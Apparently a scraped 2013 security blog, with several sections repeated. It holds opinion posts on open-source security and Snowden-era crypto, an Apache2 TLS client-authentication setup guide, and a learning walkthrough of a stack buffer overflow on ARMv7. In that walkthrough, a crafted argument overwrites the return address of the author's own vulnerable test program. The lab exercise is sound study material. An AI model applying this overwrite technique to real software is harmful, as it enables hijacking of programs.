In past few years, more and more enterprise management guys are realizing that those hardware boxes can't solve the problem, which it was supposed to be solved.* Right here, there's one thing you might want to know: Firstly, some "sec box" vendor has been using a lot of open source code( linux kernel, snort, l7, BRO, etc) but they never contribute to the community. *........Personally I do believe that only old school cybersec principles can make system secure. But it need skilled people to do a lot of work in the daily cybersec process. Well, the mainstream marketing are still advertising the *boxes* solution is one thing, while it's hard to find old school guys is another.
What I'm trying to say are not hardware boxes are not important. But people also can do small business with trying to find cheap and effective solution. That's where open source cybersec solution fit in. There are a lot of great cybersec open source project. All you have to do is to pay someone who know
these cybersec open source code and combine them into the your own cybersec solution. For example, a customer want to hardening their network and server. There are a lot of open source sec project can do that, such as
iptables/snort/psad/tcpwrapper/apparmor/openssl/apache or web level
hardening stuff( inside the DJANGO for preventing sql injection, mod_security, etc). But the customer would pay someone who know about it to consulting for
them. The skilled guy could train customer's IT guys or go through
with their own implementation. Personally, I think it's the best to do
the cybersec small business. It's win-win solution! Old school guys get
pay and customer are happy.
btw: Some regions may have these cybersec small business model already.
--------------------------------------------------------------------------
Well, it's Christmas today. As a Neo-Calvinist, I wouldn't talk about religion too much in my daily life. But all in all, neo-calvinist is Christian indeed. I'm not too religious. Sometimes, I really hate those nominal christian was feel so good to doing terrible things in name of god....fuc* them....Anyway, hacker is a type of people who are willing to seek the truth with no matter cost. Even I'd see L0rd Jesus look like overmind( from starcraft) after I die. The problem to me would be "Is this true my L0rd looks like overmind?", if he is the L0rd whatever he looks like, I'd be still worship him;-)
Hacker can pick the red pill.
Hacker can destroy the blue pill.
Hacker can embrace the desert of the real.
Merry Christmas, my fellow brothers/sisters!
May L0rd's hacking spirit guide us in 2014!!!
Bruce Schneier, our great philosopher in cybersec field. And Eben Moglen, afaik, he is a great hacker( not in computer stuff) in free software law field. I do remember I used to listen Eben's free speech( electronic version) when I was in college. Seven years until now, I know better about why there are group of people has been trying fight for digital rights, software freedom, etc.....
I'm here to share something I've learn from Bruce and Eben today. This writeup is going to be my notes and some personal summary of 2013. It may be mess a little bit;-)
What do we learn from Mr Snowden's disclosure about crypto?
------------------------------------------------------------------
Cryptography itself is still hard to break. NSA is not breaking the math, but breaking by cheating, by stealing private keys, by forging certificates, by doing non-crypto stuff to archive their *ditry* goals. Even in the fucked-up case of Google, NSA didn't crack the traffic between user's browser and Google's server. Because Google uses client auth SSL at default, more importantly, it works( NSA dont like it). But NSA hijacked the traffic between Google data centers where the SSL/TLS was removed for whatever reasons( cost?). Crypto is still the one of the best ways to fight NSA or NSA-like organization.
Tor stories?
------------------------------------------------------------------
Personally, I like Tor. It probably could save people's life in some "restricted" area. Tor is pissed off agencies like NSA. The contributors of Tor project have routine seminars. It seems that the discussion of how to break Tor is their daily bread;-) Thanks to Tor project contributors.
What if NSA is in our threat model?
------------------------------------------------------------------
The 1st thing is mitigation: NSA got a piece of math but still need a bunch of engineers to make it work. Let NSA pay for higher cost( timing budget not new math). Plz use particular crypto technology( on GNU/Linux distro) as much as possible. It's reasonable to speculating that NSA has something about crypto stuff but we don't. Information asymmetry is indeed exsit. Of course NSA known what we do in past decades but we are rarely to known what NSA has been doing in the same period..so thanks to Mr Snowden's disclosure gave us *a little more* information.
And NSA-like organizations are definitely needs a lot of automated attack tools: foxasset? The reason it simple: you can't just train people on the street to become old school hackers in few months. That's why they have to develop automated tools.
btw: What does old school hacker mean in my context? A type of people who are highly skilled with low-level techniques, such as *NIX System, networking( both internet stuff and corenet of telco), reversing, cryptography, C/ASM code audit, etc..and also have a specific type of strong philosophy with underground spirit;-)....ug spirit~wth
Standard corruption?
------------------------------------------------------------------
It's not all standards does security matters. Bruce thinks AES is still secure. We can't only blame the Dual ECC stuff to standard process's fault. Implementation is important, such as non-NSA involved internation cellphone standard was fucked up..A1/5? Ring the bell? We should only trust these public standards, which our guys( free software enthusiast, cybersec philosophical anarchist like Phrack guys? or people like Bruce?:)) are getting involve with it.
What tools can we trust?
------------------------------------------------------------------
GNUPG, tor, OTR, etc... Some of these open source tools are written by security/crypto paranoids. They have a very awesome design and implementation.
What if you are on the target list of NSA-like organization?
------------------------------------------------------------------
If you are targeted, there's nothing you can do in that level. Is this a super-APT shit?
Is cyberwar going to be end?
------------------------------------------------------------------
I don't think so. If everyone holds the philosophy of "I'll fuck you if you don't fuck me first, sir", then it would turn the whole scene to be everybody being fucked by everybody. That's what old school hackers has been through the paradigm shift( painfully?) from old good hacking days to "This is cyber, sir!".
Is that sounds we are hopeless?
------------------------------------------------------------------
Nope, quoted from Bruce:"Society improves because people dare to think the unthinkable and then after 20, 30 years everyone says that was kind of good idea. It takes a while but it has to start."
FOSS solutions?
------------------------------------------------------------------
Bruce thinks open source solution is more secure than closed ones. Because:
1, You can look at it( source code)
2, It's harder to let someone slip into
We probably don't need to worry too much( did I say "too much"?) about NSA was/is/will try to put backdoor in some fundamental free software projects, like linux kernel, GCC, Glibc, "supposed to be re-written" openssl;-) etc. Because according to the full-disclosured documentations, NSA seems amazingly risks aversed. They only want to take a safe path. Yeah..yeah, I know what they're thinking...you can do evil, but don't be caught up;-) Free/open source community have a lot of old school hackers has been do code review for decades. They did a great job. And they are going to continue this *secret* war aginst NSA-like organization. So it's not easy attack( backdooring) on compiler.....( and, there are tons of guys like me are trying to be old school hackers).
Leap of faith?
------------------------------------------------------------------
Yeah, it sounds perfect. But no one can ensure you 100% secure. But the fact is that you can't examine everything. You must trust them( the tools you use). Give yourself a little faith. Did Soren A. Kierkegarrd said that we could feel comfortable to use GCC;-)
Well, use Apple products( iphone, ipad, ishit) and Microsoft products( Win for gaming platform, Office for whatever) are not a good options. Drop them, come on!
Hardware box issues: never update the full-disclosured vulns:
------------------------------------------------------------------
In some countries, cybersec business couldn't support small business. The reason cause that happened, because the most of customers had/have the wrong concept about cybersec. They think the only thing you need to do is
buy a bunch of hardware boxes( firewall, IDS/IPS, UTM, NGFW, or whatever). Obviously, it's violating the very important old school principles:
------------------------------------------------------------------
Security is NOT:
Security is NOT installing a firewall ..
Security is NOT a Product or Service .. ( by Schneier, Bruce )
Security is Not a Product; It's a Process .. ( by Schneier, Bruce )
A Security Audit is NOT "running a port scan and turning things off" ..
Security is:
Security is "Can you still continue to work productively/safely, without compounding the security breach"
Security is only as good as your "weakest link"
Security is "risk management" of your corporate resources(computers/people), required expertise, time management, implementation costs, data backup/recovery proceedures ...
Security is a Process, Methodology, Costs, Policies and People
Security is "Can somebody physically walk out with your computers,
disks, tapes, .. "
Security is 24x7x365 ... constantly ongoing .. never ending
Security is "learn all you can as fast as you can, without negatively
affecting the network, productivity and budget"
------------------------------------------------------------------
In past few years, more and more enterprise management guys are realizing that those hardware boxes can't solve the problem, which it was supposed to be solved.* Right here, there's one thing you might want to know: Firstly, some "sec box" vendor has been using a lot of open source code( linux kernel, snort, l7, BRO, etc) but they never contribute to the community. *........Personally I do believe that only old school cybersec principles can make system secure. But it need skilled people to do a lot of work in the daily cybersec process. Well, the mainstream marketing are still advertising the *boxes* solution is one thing, while it's hard to find old school guys is another.
What I'm trying to say are not hardware boxes are not important. But people also can do small business with trying to find cheap and effective solution. That's where open source cybersec solution fit in. There are a lot of great cybersec open source project. All you have to do is to pay someone who know
these cybersec open source code and combine them into the your own cybersec solution. For example, a customer want to hardening their network and server. There are a lot of open source sec project can do that, such as
iptables/snort/psad/tcpwrapper/apparmor/openssl/apache or web level
hardening stuff( inside the DJANGO for preventing sql injection, mod_security, etc). But the customer would pay someone who know about it to consulting for
them. The skilled guy could train customer's IT guys or go through
with their own implementation. Personally, I think it's the best to do
the cybersec small business. It's win-win solution! Old school guys get
pay and customer are happy.
btw: Some regions may have these cybersec small business model already.
--------------------------------------------------------------------------
Well, it's Christmas today. As a Neo-Calvinist, I wouldn't talk about religion too much in my daily life. But all in all, neo-calvinist is Christian indeed. I'm not too religious. Sometimes, I really hate those nominal christian was feel so good to doing terrible things in name of god....fuc* them....Anyway, hacker is a type of people who are willing to seek the truth with no matter cost. Even I'd see L0rd Jesus look like overmind( from starcraft) after I die. The problem to me would be "Is this true my L0rd looks like overmind?", if he is the L0rd whatever he looks like, I'd be still worship him;-)
Hacker can pick the red pill.
Hacker can destroy the blue pill.
Hacker can embrace the desert of the real.
Merry Christmas, my fellow brothers/sisters!
May L0rd's hacking spirit guide us in 2014!!!
Wednesday, November 27, 2013
How to set up apache2 with SSL/TLS support and client auth on Debian 7.2
I think SSL/TLS should be part of security hardening process. Only fools would not use cryptography technology in post-prism era. I think what Mr Snowden did, that was proved one thing: Richard Stallman and Phrack guys( I prefer use the term "philosophical anarchist") never lie to us;-) Well, I don't wanna bullshit anything about this controversial topic here...let's see how we can set up a HTTPS server with client auth.
Generate CA certificates:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# cp /usr/lib/ssl/misc/CA.sh .
root@d6-test:/opt/ssl# ./CA.sh -newca
CA certificate filename (or enter to create)
Making CA certificate ...
Generating a 2048 bit RSA private key
..................................+++
..............................................+++
writing new private key to './demoCA/private/./cakey.pem'
.............................................
.............................................
Country Name (2 letter code) [AU]:CN
State or Province Name (full name) [Some-State]:Shanghai
Locality Name (eg, city) []:Shanghai
Organization Name (eg, company) [Internet Widgits Pty Ltd]:MOT
Organizational Unit Name (eg, section) []:MOT
Common Name (e.g. server FQDN or YOUR name) []:hardened-shit
Email Address []:info@hardened-shit.com
Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
Using configuration from /usr/lib/ssl/openssl.cnf
Enter pass phrase for ./demoCA/private/./cakey.pem:
Check that the request matches the signature
Signature ok
Certificate Details:
Serial Number:
c0:81:0e:bc:52:d0:19:5a
Validity
Not Before: Nov 19 02:08:14 2013 GMT
Not After : Nov 18 02:08:14 2016 GMT
Subject:
countryName = CN
stateOrProvinceName = Shanghai
organizationName = MOT
organizationalUnitName = MOT
commonName = hardened-shit
emailAddress = info@hardened-shit.com
X509v3 extensions:
X509v3 Subject Key Identifier:
D5:38:4C:2F:FE:CF:E5:19:E9:AC:C5:03:6E:81:6A:D9:15:8F:A8:63
X509v3 Authority Key Identifier:
keyid:D5:38:4C:2F:FE:CF:E5:19:E9:AC:C5:03:6E:81:6A:D9:15:8F:A8:63
X509v3 Basic Constraints:
CA:TRUE
Certificate is to be certified until Nov 18 02:08:14 2016 GMT (1095 days)
Write out database with 1 new entries
Data Base Updated
--------------------------------------------------------------------------------
Copy intermediate key and certificate:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# cp demoCA/private/cakey.pem ca.key
root@d6-test:/opt/ssl#
root@d6-test:/opt/ssl# cp demoCA/cacert.pem ca.crt
--------------------------------------------------------------------------------
Generate server key:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl genrsa -des3 -out server.key 2048
Generating RSA private key, 2048 bit long modulus
...+++
.................+++
e is 65537 (0x10001)
Enter pass phrase for server.key:
Verifying - Enter pass phrase for server.key:
--------------------------------------------------------------------------------
Generate server CSR(Certificate Signing Request) with server key:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl req -new -key server.key -out server.csr
...........................................
........................................
-----
Country Name (2 letter code) [AU]:CN
State or Province Name (full name) [Some-State]:Shanghai
Locality Name (eg, city) []:Shanghai
Organization Name (eg, company) [Internet Widgits Pty Ltd]:MOT
Organizational Unit Name (eg, section) []:MOT
Common Name (e.g. server FQDN or YOUR name) []:hardened-shit
Email Address []:info@hardened-shit.com
Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
--------------------------------------------------------------------------------
Genrate server certificate:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl req -x509 -days 2048 -key server.key -in server.csr > server.crt
Enter pass phrase for server.key
--------------------------------------------------------------------------------
You can check out the cert or verify it:
openssl x509 -noout -text -in server.crt
openssl verify -CAfile ca.crt server.crt
Generate client's key:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl genrsa -des3 -out client.key 2048
Generating RSA private key, 2048 bit long modulus
..........................................................................................................................................+++
........+++
e is 65537 (0x10001)
Enter pass phrase for client.key:
Verifying - Enter pass phrase for client.key:
--------------------------------------------------------------------------------
Client's CSR:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl req -new -key client.key -out client.csr
.......................................................
..............................................
-----
Country Name (2 letter code) [AU]:CN
State or Province Name (full name) [Some-State]:Shanghai
Locality Name (eg, city) []:Shanghai
Organization Name (eg, company) [Internet Widgits Pty Ltd]:MOT
Organizational Unit Name (eg, section) []:MOT
Common Name (e.g. server FQDN or YOUR name) []:hardened-shit
Email Address []:info@hardened-info.com
Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
Generate client's certificate with CA certificate's signature:
root@d6-test:/opt/ssl# openssl ca -in client.csr -out client.crt
Using configuration from /usr/lib/ssl/openssl.cnf
Enter pass phrase for ./demoCA/private/cakey.pem:
Check that the request matches the signature
Signature ok
Certificate Details:
Serial Number:
c0:81:0e:bc:52:d0:19:5c
Validity
Not Before: Nov 19 02:28:13 2013 GMT
Not After : Nov 19 02:28:13 2014 GMT
Subject:
countryName = CN
stateOrProvinceName = Shanghai
organizationName = MOT
organizationalUnitName = MOT
commonName = hardened-shit
emailAddress = info@hardened-info.com
X509v3 extensions:
X509v3 Basic Constraints:
CA:FALSE
Netscape Comment:
OpenSSL Generated Certificate
X509v3 Subject Key Identifier:
A6:A5:D7:7C:C7:A8:C3:24:C7:90:14:76:84:15:43:D0:2C:0C:31:66
X509v3 Authority Key Identifier:
keyid:D5:38:4C:2F:FE:CF:E5:19:E9:AC:C5:03:6E:81:6A:D9:15:8F:A8:63
Certificate is to be certified until Nov 19 02:28:13 2014 GMT (365 days)
Sign the certificate? [y/n]:y
1 out of 1 certificate requests certified, commit? [y/n]y
Write out database with 1 new entries
Data Base Updated
--------------------------------------------------------------------------------
Convert to pkcs12 format, which can be identified by firefox:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl pkcs12 -export -clcerts -in client.crt -inkey client.key -out client.pfx
Enter pass phrase for client.key:
Enter Export Password:
Verifying - Enter Export Password:
--------------------------------------------------------------------------------
Enable SSL/TLS support in Apache2:
--------------------------------------------------------------------------------
root@hardened-shit:/opt# mv ssl /etc/ssl/hardened-shit
root@hardened-shit:/etc/apache2# a2ensite default-ssl
Enabling site default-ssl.
To activate the new configuration, you need to run:
service apache2 reload
root@hardened-shit:/etc/apache2# a2enmod ssl
Module ssl already enabled
edit /etc/apache2/sites-enabled/default-ssl:
SSLCertificateFile /etc/ssl/hardened-shit/server.crt
SSLCertificateKeyFile /etc/ssl/hardened-shit/server.key
SSLCertificateChainFile /etc/ssl/hardened-shit/ca.crt
SSLCACertificatePath /etc/ssl/hardened-shit/
SSLCACertificateFile /etc/ssl/hardened-shit/ca.crt
SSLVerifyClient require
SSLVerifyDepth 10
Disable port 80:
root@hardened-shit:/etc/apache2# a2dissite default
--------------------------------------------------------------------------------
Done....it should works.
btw: I highly recommend you to read these two articles if you want to know further: Hardening Your Web Server's SSL Ciphers, and TLS Perfect Forward Secrecy support with Apache
I only enable the secure ciphers:
SSLCipherSuite HIGH:MEDIUM:!aNULL:!MD5
SSLProtocol +TLSv1.2 +TLSv1.1
Generate CA certificates:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# cp /usr/lib/ssl/misc/CA.sh .
root@d6-test:/opt/ssl# ./CA.sh -newca
CA certificate filename (or enter to create)
Making CA certificate ...
Generating a 2048 bit RSA private key
..................................+++
..............................................+++
writing new private key to './demoCA/private/./cakey.pem'
.............................................
.............................................
Country Name (2 letter code) [AU]:CN
State or Province Name (full name) [Some-State]:Shanghai
Locality Name (eg, city) []:Shanghai
Organization Name (eg, company) [Internet Widgits Pty Ltd]:MOT
Organizational Unit Name (eg, section) []:MOT
Common Name (e.g. server FQDN or YOUR name) []:hardened-shit
Email Address []:info@hardened-shit.com
Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
Using configuration from /usr/lib/ssl/openssl.cnf
Enter pass phrase for ./demoCA/private/./cakey.pem:
Check that the request matches the signature
Signature ok
Certificate Details:
Serial Number:
c0:81:0e:bc:52:d0:19:5a
Validity
Not Before: Nov 19 02:08:14 2013 GMT
Not After : Nov 18 02:08:14 2016 GMT
Subject:
countryName = CN
stateOrProvinceName = Shanghai
organizationName = MOT
organizationalUnitName = MOT
commonName = hardened-shit
emailAddress = info@hardened-shit.com
X509v3 extensions:
X509v3 Subject Key Identifier:
D5:38:4C:2F:FE:CF:E5:19:E9:AC:C5:03:6E:81:6A:D9:15:8F:A8:63
X509v3 Authority Key Identifier:
keyid:D5:38:4C:2F:FE:CF:E5:19:E9:AC:C5:03:6E:81:6A:D9:15:8F:A8:63
X509v3 Basic Constraints:
CA:TRUE
Certificate is to be certified until Nov 18 02:08:14 2016 GMT (1095 days)
Write out database with 1 new entries
Data Base Updated
--------------------------------------------------------------------------------
Copy intermediate key and certificate:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# cp demoCA/private/cakey.pem ca.key
root@d6-test:/opt/ssl#
root@d6-test:/opt/ssl# cp demoCA/cacert.pem ca.crt
--------------------------------------------------------------------------------
Generate server key:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl genrsa -des3 -out server.key 2048
Generating RSA private key, 2048 bit long modulus
...+++
.................+++
e is 65537 (0x10001)
Enter pass phrase for server.key:
Verifying - Enter pass phrase for server.key:
--------------------------------------------------------------------------------
Generate server CSR(Certificate Signing Request) with server key:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl req -new -key server.key -out server.csr
...........................................
........................................
-----
Country Name (2 letter code) [AU]:CN
State or Province Name (full name) [Some-State]:Shanghai
Locality Name (eg, city) []:Shanghai
Organization Name (eg, company) [Internet Widgits Pty Ltd]:MOT
Organizational Unit Name (eg, section) []:MOT
Common Name (e.g. server FQDN or YOUR name) []:hardened-shit
Email Address []:info@hardened-shit.com
Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
--------------------------------------------------------------------------------
Genrate server certificate:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl req -x509 -days 2048 -key server.key -in server.csr > server.crt
Enter pass phrase for server.key
--------------------------------------------------------------------------------
You can check out the cert or verify it:
openssl x509 -noout -text -in server.crt
openssl verify -CAfile ca.crt server.crt
Generate client's key:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl genrsa -des3 -out client.key 2048
Generating RSA private key, 2048 bit long modulus
..........................................................................................................................................+++
........+++
e is 65537 (0x10001)
Enter pass phrase for client.key:
Verifying - Enter pass phrase for client.key:
--------------------------------------------------------------------------------
Client's CSR:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl req -new -key client.key -out client.csr
.......................................................
..............................................
-----
Country Name (2 letter code) [AU]:CN
State or Province Name (full name) [Some-State]:Shanghai
Locality Name (eg, city) []:Shanghai
Organization Name (eg, company) [Internet Widgits Pty Ltd]:MOT
Organizational Unit Name (eg, section) []:MOT
Common Name (e.g. server FQDN or YOUR name) []:hardened-shit
Email Address []:info@hardened-info.com
Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
Generate client's certificate with CA certificate's signature:
root@d6-test:/opt/ssl# openssl ca -in client.csr -out client.crt
Using configuration from /usr/lib/ssl/openssl.cnf
Enter pass phrase for ./demoCA/private/cakey.pem:
Check that the request matches the signature
Signature ok
Certificate Details:
Serial Number:
c0:81:0e:bc:52:d0:19:5c
Validity
Not Before: Nov 19 02:28:13 2013 GMT
Not After : Nov 19 02:28:13 2014 GMT
Subject:
countryName = CN
stateOrProvinceName = Shanghai
organizationName = MOT
organizationalUnitName = MOT
commonName = hardened-shit
emailAddress = info@hardened-info.com
X509v3 extensions:
X509v3 Basic Constraints:
CA:FALSE
Netscape Comment:
OpenSSL Generated Certificate
X509v3 Subject Key Identifier:
A6:A5:D7:7C:C7:A8:C3:24:C7:90:14:76:84:15:43:D0:2C:0C:31:66
X509v3 Authority Key Identifier:
keyid:D5:38:4C:2F:FE:CF:E5:19:E9:AC:C5:03:6E:81:6A:D9:15:8F:A8:63
Certificate is to be certified until Nov 19 02:28:13 2014 GMT (365 days)
Sign the certificate? [y/n]:y
1 out of 1 certificate requests certified, commit? [y/n]y
Write out database with 1 new entries
Data Base Updated
--------------------------------------------------------------------------------
Convert to pkcs12 format, which can be identified by firefox:
--------------------------------------------------------------------------------
root@d6-test:/opt/ssl# openssl pkcs12 -export -clcerts -in client.crt -inkey client.key -out client.pfx
Enter pass phrase for client.key:
Enter Export Password:
Verifying - Enter Export Password:
--------------------------------------------------------------------------------
Enable SSL/TLS support in Apache2:
--------------------------------------------------------------------------------
root@hardened-shit:/opt# mv ssl /etc/ssl/hardened-shit
root@hardened-shit:/etc/apache2# a2ensite default-ssl
Enabling site default-ssl.
To activate the new configuration, you need to run:
service apache2 reload
root@hardened-shit:/etc/apache2# a2enmod ssl
Module ssl already enabled
edit /etc/apache2/sites-enabled/default-ssl:
SSLCertificateFile /etc/ssl/hardened-shit/server.crt
SSLCertificateKeyFile /etc/ssl/hardened-shit/server.key
SSLCertificateChainFile /etc/ssl/hardened-shit/ca.crt
SSLCACertificatePath /etc/ssl/hardened-shit/
SSLCACertificateFile /etc/ssl/hardened-shit/ca.crt
SSLVerifyClient require
SSLVerifyDepth 10
Disable port 80:
root@hardened-shit:/etc/apache2# a2dissite default
--------------------------------------------------------------------------------
Done....it should works.
btw: I highly recommend you to read these two articles if you want to know further: Hardening Your Web Server's SSL Ciphers, and TLS Perfect Forward Secrecy support with Apache
I only enable the secure ciphers:
SSLCipherSuite HIGH:MEDIUM:!aNULL:!MD5
SSLProtocol +TLSv1.2 +TLSv1.1
Thursday, November 21, 2013
Hello, stack bufferoverflow on Debian ARMv7
I haven't make my hands *dirty* for a long time since I stopped on io-wargame lvl11. As we all know that ARM architectures are becoming sec guys's daily bread. I think it's time to begin my journey to explore what's the diff between ARMv7 and x86/x64 out there. It would be good to build a testing environment in the pre-adventure stage. Debian has been supporting ARMv7 for a while. You can follow this great article to install a Debian GNU/Linux for ARMv7( armhf) distro. After the installation, you probably want to config a NAT network between host and qemu guest. Or just use my network config.
To figure out the memory layout is a good starting point. Take a glance at the code at 1st, plz.....
shawn@debian-armhf:~/citypw-SCFE/security/overwrite_ret_addr_armv7$ gdb ./victim -q
Reading symbols from /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim...done.
(gdb) disassemble main
Dump of assembler code for function main:
0x00008448 <+0>: push {r7, lr}
0x0000844a <+2>: sub sp, #8
0x0000844c <+4>: add r7, sp, #0
0x0000844e <+6>: str r0, [r7, #4]
0x00008450 <+8>: str r1, [r7, #0]
0x00008452 <+10>: movw r3, #34040 ; 0x84f8
0x00008456 <+14>: movt r3, #0
0x0000845a <+18>: mov r0, r3
0x0000845c <+20>: movw r1, #33797 ; 0x8405
0x00008460 <+24>: movt r1, #0
0x00008464 <+28>: movw r2, #33845 ; 0x8435
0x00008468 <+32>: movt r2, #0
0x0000846c <+36>: blx 0x8340
0x00008470 <+40>: ldr r3, [r7, #0]
0x00008472 <+42>: add.w r3, r3, #4
0x00008476 <+46>: ldr r3, [r3, #0]
0x00008478 <+48>: mov r0, r3
0x0000847a <+50>: bl 0x8404
0x0000847e <+54>: mov.w r3, #0 ==> 0x0000847e should be the return address of test()
0x00008482 <+58>: mov r0, r3
0x00008484 <+60>: add.w r7, r7, #8
0x00008488 <+64>: mov sp, r7
0x0000848a <+66>: pop {r7, pc}
End of assembler dump.
(gdb) disassemble fuck_me
Dump of assembler code for function fuck_me:
0x00008434 <+0>: push {r7, lr} ===> Use 0x00008434 to overwrite test()'s ret addr
0x00008436 <+2>: add r7, sp, #0
0x00008438 <+4>: movw r0, #34024 ; 0x84e8
0x0000843c <+8>: movt r0, #0
0x00008440 <+12>: blx 0x8358
0x00008444 <+16>: pop {r7, pc}
End of assembler dump.
Let's check the memory layout:
(gdb) b test
Breakpoint 1 at 0x840c: file victim.c, line 11.
(gdb) r AAAABBBB
Starting program: /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim AAAABBBB
The address of func test(): 0x8405, func fuck_me(): 0x8435
Breakpoint 1, test (input=0x7efff919 "AAAABBBB") at victim.c:11
11 strcpy(buf, input);
(gdb) n
12 printf("%s \n", buf);
(gdb)
AAAABBBB
13 }
(gdb) x/12x $sp
0x7efff658: 0x00000000 0x7efff919 0x000084f8 0x41414141
0x7efff668: 0x42424242 0x00008400 0x7efff678 0x0000847f==> ret addr of test()
0x7efff678: 0x7efff7d4 0x00000002 0x00000000 0x76f12cfb
So the layout should be like this:
[high addr]...[buf:..16-byte...][Return addr]...[low addr]
Why the hell the addr of 0x0000847e we saw above now became 0x0000847f. Weird...Anyone know about what happened?
OK, let's try our 1st exp:
(gdb) r `python -c 'print "A" * 16 + "\x34\x84"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim `python -c 'print "A" * 16 + "\x34\x84"'`
The address of func test(): 0x8405, func fuck_me(): 0x8435
Breakpoint 1, test (input=0x7efff90f 'A', "4\204") at victim.c:11
11 strcpy(buf, input);
(gdb) c
Continuing.
AAAAAAAAAAAAAAAA4�
Program received signal SIGILL, Illegal instruction.
fuck_me () at victim.c:17
17 printf("being hacked\n");
(gdb) n
Program terminated with signal SIGILL, Illegal instruction.
The program no longer exists.
Did you see this? +1 with the fuc_me()'s addr, plz.....
(gdb) r `python -c 'print "A" * 16 + "\x35\x84"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim `python -c 'print "A" * 16 + "\x35\x84"'`
The address of func test(): 0x8405, func fuck_me(): 0x8435
Breakpoint 1, test (input=0x7efff90f 'A', "5\204") at victim.c:11
11 strcpy(buf, input);
(gdb) c
Continuing.
AAAAAAAAAAAAAAAA5�
being hacked
Program received signal SIGSEGV, Segmentation fault.
0x00008432 in test (input=) at victim.c:13
13 }
It worked! So, the exp should be like:
shawn@debian-armhf:~/citypw-SCFE/security/overwrite_ret_addr_armv7$ ./victim `python -c 'print "A" * 16 + "\x35\x84"'`
The address of func test(): 0x8405, func fuck_me(): 0x8435
AAAAAAAAAAAAAAAA5�
being hacked
Segmentation fault
===========================
I guess the exploit of ARM would be much different to x86. I've heard of ret2libc won't work on ARM. That's really interesting and worth to figure it out. Obviously, this Phrack paper and some manuals should be added into my must-read list.
To figure out the memory layout is a good starting point. Take a glance at the code at 1st, plz.....
shawn@debian-armhf:~/citypw-SCFE/security/overwrite_ret_addr_armv7$ gdb ./victim -q
Reading symbols from /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim...done.
(gdb) disassemble main
Dump of assembler code for function main:
0x00008448 <+0>: push {r7, lr}
0x0000844a <+2>: sub sp, #8
0x0000844c <+4>: add r7, sp, #0
0x0000844e <+6>: str r0, [r7, #4]
0x00008450 <+8>: str r1, [r7, #0]
0x00008452 <+10>: movw r3, #34040 ; 0x84f8
0x00008456 <+14>: movt r3, #0
0x0000845a <+18>: mov r0, r3
0x0000845c <+20>: movw r1, #33797 ; 0x8405
0x00008460 <+24>: movt r1, #0
0x00008464 <+28>: movw r2, #33845 ; 0x8435
0x00008468 <+32>: movt r2, #0
0x0000846c <+36>: blx 0x8340
0x00008470 <+40>: ldr r3, [r7, #0]
0x00008472 <+42>: add.w r3, r3, #4
0x00008476 <+46>: ldr r3, [r3, #0]
0x00008478 <+48>: mov r0, r3
0x0000847a <+50>: bl 0x8404
0x0000847e <+54>: mov.w r3, #0 ==> 0x0000847e should be the return address of test()
0x00008482 <+58>: mov r0, r3
0x00008484 <+60>: add.w r7, r7, #8
0x00008488 <+64>: mov sp, r7
0x0000848a <+66>: pop {r7, pc}
End of assembler dump.
(gdb) disassemble fuck_me
Dump of assembler code for function fuck_me:
0x00008434 <+0>: push {r7, lr} ===> Use 0x00008434 to overwrite test()'s ret addr
0x00008436 <+2>: add r7, sp, #0
0x00008438 <+4>: movw r0, #34024 ; 0x84e8
0x0000843c <+8>: movt r0, #0
0x00008440 <+12>: blx 0x8358
0x00008444 <+16>: pop {r7, pc}
End of assembler dump.
Let's check the memory layout:
(gdb) b test
Breakpoint 1 at 0x840c: file victim.c, line 11.
(gdb) r AAAABBBB
Starting program: /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim AAAABBBB
The address of func test(): 0x8405, func fuck_me(): 0x8435
Breakpoint 1, test (input=0x7efff919 "AAAABBBB") at victim.c:11
11 strcpy(buf, input);
(gdb) n
12 printf("%s \n", buf);
(gdb)
AAAABBBB
13 }
(gdb) x/12x $sp
0x7efff658: 0x00000000 0x7efff919 0x000084f8 0x41414141
0x7efff668: 0x42424242 0x00008400 0x7efff678 0x0000847f==> ret addr of test()
0x7efff678: 0x7efff7d4 0x00000002 0x00000000 0x76f12cfb
So the layout should be like this:
[high addr]...[buf:..16-byte...][Return addr]...[low addr]
Why the hell the addr of 0x0000847e we saw above now became 0x0000847f. Weird...Anyone know about what happened?
OK, let's try our 1st exp:
(gdb) r `python -c 'print "A" * 16 + "\x34\x84"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim `python -c 'print "A" * 16 + "\x34\x84"'`
The address of func test(): 0x8405, func fuck_me(): 0x8435
Breakpoint 1, test (input=0x7efff90f 'A'
11 strcpy(buf, input);
(gdb) c
Continuing.
AAAAAAAAAAAAAAAA4�
Program received signal SIGILL, Illegal instruction.
fuck_me () at victim.c:17
17 printf("being hacked\n");
(gdb) n
